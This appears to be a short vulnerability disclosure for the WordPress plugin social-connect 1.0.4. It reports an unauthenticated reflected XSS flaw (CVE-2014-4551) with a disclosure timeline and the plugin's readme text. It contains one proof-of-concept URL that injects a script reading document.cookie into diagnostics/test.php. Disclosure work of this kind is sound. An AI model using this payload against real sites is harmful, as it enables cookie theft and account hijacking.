wp-plugin : social-connect – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : social-connect

 

Effected Version : 1.0.4 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/socialconnect/diagnostics/test.php?testing=testing%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4551

 
Plugin Description :
 
Social Connect adds social login buttons on the login, register and comment forms of your WordPress site.

The buttons offer login and registration using a Twitter, Facebook, Google, Yahoo or WordPress.com account.

It makes it super easy for new members to register with your site and existing members to login.

= Props =

Special thanks to:

* [markusdrake](http://wordpress.org/support/profile/markusdrake) for patches and helping in the support forums;
* [L D](http://wordpress.org/support/profile/enochfung) for patches and helping in the support forums;
* [Geodanny](http://wordpress.org/support/profile/geodanny) for helping in the support forums; and
* [Wirone](http://blog.wirone.info/) for polish translation and patches.

And everyone else in the forums sharing the fixes they find and answering each others questions.

= Contribute =

Social Connect is rapidly growing in popularity and help with the growing pains is appreciated.

If you're a developer, you can contribute fixes & optimisations via [Social Connect on GitHub](https://github.com/thenbrent/social-connect).

Everyone can help out by answering questions in the [Support Forums](http://wordpress.org/tags/social-connect?forum_id=10#postform).

Leave a Reply

Your email address will not be published. Required fields are marked *